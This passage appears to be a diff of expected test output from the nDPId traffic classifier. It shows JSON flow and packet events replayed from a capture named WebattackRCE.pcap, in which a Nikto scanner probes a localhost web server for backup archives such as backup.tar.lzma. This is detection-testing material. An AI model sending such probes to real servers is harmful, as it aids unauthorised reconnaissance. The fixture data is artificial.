00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":1,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277144,"pkt":"AAAAAAAAAAAAAAAACABFAADHO5VAAEAGAJp\/AAABfwAAAcPYH5AuGgMWrL1WfYAYAED+uwAAAQEICp1m\/MCdZvzAR0VUIC9iYWNrdXAudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277144,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_packet_id":1,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277145,"pkt":"AAAAAAAAAAAAAAAACABFAADD1QZAAEAGZyx\/AAABfwAAAcPaH5AWHu2DG+Oig4AYAED+twAAAQEICp1m\/MGdZvzBR0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":297,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277145,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":1,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277148,"pkt":"AAAAAAAAAAAAAAAACABFAADDYFdAAEAG29t\/AAABfwAAAcPcH5BE+VjTl6\/NvYAYAED+twAAAQEICp1m\/MSdZvzER0VUIC8xMjcuMC4wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":298,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277148,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277153,"pkt":"AAAAAAAAAAAAAAAACABFAADCOn5AAEAGAbZ\/AAABfwAAAcPeH5C7hwL1asNzroAYAED+tgAAAQEICp1m\/MmdZvzJR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":299,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277153,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277155,"pkt":"AAAAAAAAAAAAAAAACABFAADCDytAAEAGLQl\/AAABfwAAAcPgH5C7IzeiGEGCK4AYAED+tgAAAQEICp1m\/MudZvzLR0VUIC8xMjcwMDEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":300,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277155,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277157,"pkt":"AAAAAAAAAAAAAAAACABFAADJ8y5AAEAGSP5\/AAABfwAAAcPiH5D9g8umqBgGFIAYAED+vQAAAQEICp1m\/M2dZvzNR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277157,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277159,"pkt":"AAAAAAAAAAAAAAAACABFAADJ4mhAAEAGWcR\/AAABfwAAAcPkH5ACw9rweorXCIAYAED+vQAAAQEICp1m\/M+dZvzPR0VUIC8xMjcuMC4wLjEudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277159,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277160,"pkt":"AAAAAAAAAAAAAAAACABFAAC9m2BAAEAGoNh\/AAABfwAAAcPmH5DB5aPVANERlIAYAED+sQAAAQEICp1m\/NCdZvzQR0VUIC8xLnRhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277160,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 